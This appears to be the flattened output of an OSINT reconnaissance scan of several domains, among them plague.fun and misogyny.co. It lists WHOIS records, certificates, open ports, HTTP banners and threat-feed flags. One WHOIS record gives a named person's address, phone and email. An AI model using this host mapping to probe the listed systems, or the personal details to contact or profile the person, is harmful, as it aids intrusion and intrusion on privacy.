  URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
  >>> Last update of WHOIS database: 2022-12-17T08:22:21.91Z <<<
  For more information on Whois status codes, please visit https://icann.org/epp
2022-12-18 00:09:45 | Raw Data from RIRs | No | LeakIX | 0 | 0 | 2 | 0 | None | [raw LeakIX service records omitted] | 188.114.96.9
2022-12-18 00:41:03 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com | (Source Data: WHOIS record for misogyny.co, below)
  Domain Name: misogyny.co
  Registry Domain ID: DE1B7F6E7E80840FABD3515F2E19A8DEC-NSR
  Registrar WHOIS Server: whois.namecheap.com
  Registrar URL: http://www.namecheap.com
  Updated Date: 2022-04-14T13:53:29Z
  Creation Date: 2018-03-07T07:39:37Z
  Registry Expiry Date: 2023-03-07T07:39:37Z
  Registrar: NameCheap, Inc.
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns2.dan.com Name Server: ns1.dan.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:41:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp The above WHOIS results have been redacted to remove potential personal data. The full WHOIS output may be available to individuals and organisations with a legitimate interest in accessing this data not outweighed by the fundamental privacy rights of the data subject. To find out more, or to make a request for access, please visit: RDDSrequest.nic.co. .CO Internet, S.A.S., the Administrator for .CO, has collected this information for the WHOIS database through Accredited Registrars. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the .CO Internet registry database. .CO Internet makes this information available to you "as is" and does not guarantee its accuracy. 
By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without .CO Internet's prior written permission. .CO Internet reserves the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. In some limited cases, domains that might appear as available in whois might not actually be available as they could be already registered and the whois not yet updated and/or they could be part of the Restricted list. In this cases, performing a check through your Registrar's (EPP check) will give you the actual status of the domain. Additionally, domains currently or previously used as extensions in 3rd level domains will not be available for registration in the 2nd level. For example, org.co, mil.co, edu.co, com.co, net.co, nom.co, arts.co, firm.co, info.co, int.co, web.co, rec.co, co.co. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.cointernet.co . 
Domain name: misogyny.co Registry Domain ID: DE1B7F6E7E80840FABD3515F2E19A8DEC-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-02-22T03:37:22.39Z Creation Date: 2018-03-07T07:39:37.84Z Registrar Registration Expiration Date: 2023-03-07T07:39:37.84Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T03:41:01.74Z <<< For more 
information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:04:11 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.97.1 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.110 90.116.166.104 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.113 90.116.166.104 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:8443 188.114.96.1 2022-12-18 00:09:31 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.10:8443 188.114.96.0/24 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b3795e1bf5904c-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.96.0 2022-12-18 00:03:34 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3237.webapps.net 81.88.52.237 2022-12-18 00:31:37 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.media Registry Domain ID: 6625164ce7ec46d0ab55b0957b9dd14b-DONUTS Registrar WHOIS Server: whois.godaddy.com/ Registrar URL: http://www.godaddy.com/domains/search.aspx?ci=8990 Updated Date: 2020-04-24T08:35:16Z Creation Date: 2018-02-03T01:46:57Z Registry Expiry Date: 2025-02-03T01:46:57Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited 
https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Name Server: ns07.domaincontrol.com Name Server: ns08.domaincontrol.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:37Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. 
Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. plague.media 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77b2bb53bf092c54-ORD"]} 188.114.96.1 2022-12-18 00:10:59 Affiliate - Domain Whois No Whois 3 0 4 0 None %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. 
%% domain: wanadoo.fr status: ACTIVE eppstatus: active hold: NO holder-c: ANO00-FRNIC admin-c: ANO00-FRNIC tech-c: BLF14-FRNIC registrar: NORDNET Expiry Date: 2023-09-06T11:03:56Z created: 1995-09-12T22:00:00Z last-update: 2022-10-31T23:07:53.716977Z source: FRNIC nserver: ns1.orange.fr nserver: ns2.orange.fr nserver: ns3.orange.fr nserver: ns4.orange.fr source: FRNIC registrar: NORDNET address: 20 Rue Denis Papin address: CS 20458 address: 59664 VILLENEUVE D'ASCQ CEDEX country: FR phone: +33.969360360 e-mail: administration@nordnet.com website: https://www.nordnet.com/offres/pack_relais/presentation.php anonymous: No registered: 1997-12-29T00:00:00Z source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: NORDNET anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligdate: 2017-12-29T00:00:00Z reachstatus: not identified source: FRNIC nic-hdl: BLF14-FRNIC type: PERSON contact: Beatrice Leopold Fenu address: 78 Olivier de Serres address: 75015 Paris country: FR phone: +33.145298193 fax-no: +33.144440181 e-mail: gestionndd@francetelecom.biz registrar: NORDNET changed: 2018-01-09T13:39:00Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: NORDNET anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. 
This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligdate: 2017-12-29T00:00:00Z reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:10:59.299088Z <<< wanadoo.fr 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77a96313b8e390fe-FRA 188.114.97.1 2022-12-18 00:07:57 Malicious Internet Name Yes Cleanbrowsing.org 0 1 1 0 None Blocked by Cleanbrowsing.org [zerotwo-best-waifu.online] zerotwo-best-waifu.online 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 56 0 1 0 None 104.21.19.243 plague.fun 2022-12-18 00:04:38 Raw Data from RIRs No Maltiverse 3 0 2 0 None {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'suspicious', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2020-12-17 02:56:49', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'20500', u'is_mining_pool': False, u'ip_addr': u'172.67.147.230', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'Washington', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 38.9071923, u'lon': -77.0368707}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'source': u'Hybrid-Analysis', u'first_seen': u'2021-10-31 19:15:15', u'description': u'Malware', u'last_seen': u'2021-10-31 19:15:23'}, {u'count': 1, u'description': u'BBVA Bancomer phishing', u'source': u'Antiphishing.com.ar', u'first_seen': 
u'2020-12-17 02:56:49', u'ref': [279], u'last_seen': u'2020-12-17 02:56:49'}], u'modification_time': u'2021-10-31 19:15:23', u'asn_cidr': u'172.67.144.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 172.67.147.230 2022-12-18 00:08:28 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.52.222:443 81.88.52.222 2022-12-18 00:09:00 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.96.1 2022-12-18 00:03:05 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None hook.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:a4:7d:29:1f:15:0e:6b:ac:86:e4:4b:c0:be:69:71:a9 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 6 20:16:48 2022 GMT Not After : Jan 4 20:16:47 2023 GMT Subject: CN=hook.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:f0:6d:9d:3e:65:e2:27:e7:f9:e7:b1:43:5d:9b: 9c:71:a3:74:87:8a:60:c8:7f:29:27:0c:3b:70:18: 0e:65:ff:e2:e4:6c:b2:93:6d:33:61:6a:bf:38:4f: 05:cd:5b:2e:49:18:0c:c5:32:5e:a6:f8:13:92:a2: 54:15:20:f1:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 2D:72:09:99:1A:17:4B:10:83:60:E6:EB:30:F2:51:56:F6:45:4B:C4 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:hook.plague.fun X509v3 Certificate Policies: 
Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : Oct 6 21:16:48.471 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:B6:95:B7:C7:1C:80:2B:FD:7A:41:2D: D1:EE:2B:F0:0C:C7:D5:AD:4A:C9:E0:25:F1:61:3A:42: F4:C7:98:23:BC:02:21:00:B0:8C:72:F0:4F:8A:E8:6C: E9:F6:34:39:22:96:3C:C5:FF:9B:84:63:71:CD:62:74: 2D:25:B6:5D:82:07:80:00 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Oct 6 21:16:48.762 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DA:81:A7:33:FB:84:F9:8B:E8:59:67: 5A:B3:BB:7D:23:4E:13:C6:1F:EE:CC:11:CA:90:D9:C7: C2:B8:84:2C:2D:02:21:00:A5:46:C0:7E:74:96:53:9F: 09:9C:0C:0A:E5:A6:43:B1:BB:DE:4F:9A:14:FF:CA:3E: 71:1D:06:51:72:4F:0A:A0 Signature Algorithm: sha256WithRSAEncryption 55:5a:e5:d4:fc:c1:91:97:fc:62:bf:e7:7d:ab:bf:5e:2a:ad: c4:a2:38:e6:93:85:38:b7:1d:d3:de:32:0e:e2:4c:99:4d:11: 27:08:6e:c9:87:6b:86:71:63:52:48:6f:97:81:d6:f9:d3:dc: 30:6a:31:71:f9:50:72:a5:5c:59:fc:73:29:d0:b8:38:7a:27: 41:b3:38:31:80:5b:74:88:40:5c:51:13:29:ba:41:ab:49:a7: e8:e8:a1:04:15:8b:d3:c3:02:3a:31:08:81:2e:a2:e2:41:9c: f5:7c:f1:58:bd:ec:4c:d9:0f:e7:c3:72:72:de:1f:50:66:17: 23:e5:df:b5:36:49:5e:e1:af:17:75:d9:18:54:94:ad:e0:ae: 38:ac:2c:09:c5:01:1b:8f:32:6d:7c:38:3e:2d:4f:0d:f7:64: fd:89:7a:f0:42:66:14:a5:26:b2:2b:cf:14:ba:10:2f:cc:af: d0:b7:ba:7a:29:73:d4:f3:c1:81:fe:b4:29:3b:c6:4b:56:c8: 19:d2:3a:d5:73:1c:13:73:cf:59:a2:f3:e1:26:e5:8e:fe:04: 40:3b:31:4f:84:d4:d1:f1:ca:a5:a1:c2:9f:31:f4:54:e2:fe: 50:4a:40:71:15:f7:ff:77:5d:a2:45:82:9e:19:be:52:a9:21: 85:4e:41:e2 2022-12-18 00:03:25 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 182.204.149.34.bc.googleusercontent.com 34.149.204.182 
2022-12-18 00:03:09 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.228 81.88.52.232 2022-12-18 00:41:00 Similar Domain Yes TLD Searcher 1 0 1 0 None misogyny.co misogyny.wtf 2022-12-18 00:22:09 Malicious Internet Name Yes Cleanbrowsing.org 0 1 2 0 None Blocked by Cleanbrowsing.org [webmail.zerotwo-best-waifu.online] webmail.zerotwo-best-waifu.online 2022-12-18 00:18:21 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.8:80 188.114.97.0/24 2022-12-18 00:03:04 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:a4:99:c7:6c:cb:8c:60:87:12:4d:ac:6d:aa:bc:48:46:46 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 4 17:47:44 2022 GMT Not After : Oct 2 17:47:43 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ce:73:2c:c8:b3:db:26:51:e1:69:3c:75:92:d7: ab:cf:10:67:fe:05:65:9a:30:2d:7c:2d:4e:bf:1e: 15:12:c0:09:9c:ee:72:a7:89:e2:dd:d3:84:6a:4b: 52:9b:7c:3a:1c:0c:22:4c:2d:61:74:cf:f3:4e:65: 58:68:18:ae:42 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EB:E4:FE:82:AF:4F:43:5A:7C:54:A8:CD:51:1C:E9:3D:A1:D3:59:44 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 
4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Jul 4 18:47:45.109 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:C6:AF:8E:EE:35:F5:BA:0F:D5:07:B3: CD:FF:DA:80:2E:52:74:BF:5E:FA:32:A4:C1:96:32:07: EA:B1:FD:8C:77:02:20:55:D1:FA:78:FD:7B:CF:6B:33: 09:31:34:F9:D7:15:91:7B:FC:85:A0:BD:11:DA:B6:DF: D8:B6:B1:A0:01:46:8D Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Jul 4 18:47:45.115 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:03:7B:C2:27:5B:DD:A9:BD:2C:0B:34:D4: 4C:C0:99:D6:F8:68:DB:8E:2B:8F:22:CD:3C:A1:DA:BB: 18:DA:43:B7:02:20:3E:AD:F2:A8:58:09:D7:F4:A9:C4: 20:10:3F:08:D3:E9:2A:1F:C3:23:A3:54:CE:16:7A:71: EA:10:A7:26:76:16 Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:6c:3f:69:03:1e:e0:cc:bd:a4:57:f4:5b:33:85: c6:e6:d6:1a:98:40:6f:a3:25:c6:8e:b9:e6:03:16:6c:f0:01: 0a:a0:bf:67:01:45:c9:17:13:93:a3:3c:a7:c1:25:c0:02:31: 00:df:d1:f3:29:0e:9b:f5:d2:37:66:1b:02:ce:6c:43:4a:4b: d3:83:d0:43:fd:ac:4d:1c:44:36:30:8c:63:36:5b:00:e9:58: 73:af:c7:7c:97:25:ae:bb:e5:28:3d:45:38 plague.fun 2022-12-18 00:09:18 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.4:8080 188.114.96.0/24 2022-12-18 00:04:28 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None eforward2.registrar-servers.com misogyny.wtf 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.114 90.116.166.104 2022-12-18 00:03:04 IP Address No DNS Resolver 56 0 1 0 None 172.67.169.215 rasputain.fr 2022-12-18 00:21:51 Netblock Membership No Censys 0 0 2 0 None 172.67.128.0/20 172.67.137.37 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], 
"Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.19.243 2022-12-18 00:11:27 Physical Address No GLEIF 0 0 3 0 None C/O REGISTERED AGENT SOLUTIONS, INC., 838 Walker Road Suite 21-2, DOVER, US-DE, US, 19904 Cloudflare\, Inc. 2022-12-18 00:21:37 Open TCP Port No Censys 0 0 2 0 None 20.226.83.185:2020 20.226.83.185 2022-12-18 00:16:59 HTTP Status Code No Web Spider 0 0 4 0 None 200 http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0 2022-12-18 00:22:07 Physical Location No Censys 1 0 2 0 None Kansas City, Missouri, 64184, United States, North America 34.149.204.188 2022-12-18 00:23:19 Country No Country Name Extractor 0 0 3 0 None United States Kansas City, Missouri, 64184, United States, North America 2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 2 0 1 0 None dns1.registrar-servers.com misogyny.wtf 2022-12-18 00:09:48 Co-Hosted Site No HackerTarget 0 0 2 0 None autodiscover.nensi.eu 172.67.147.230 2022-12-18 00:22:14 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ae21ddc93522c8-ORD Content-Encoding: gzip 172.67.169.215 2022-12-18 00:09:33 Open TCP Port No LeakIX 0 0 2 0 None 104.21.27.242:80 104.21.27.242 2022-12-18 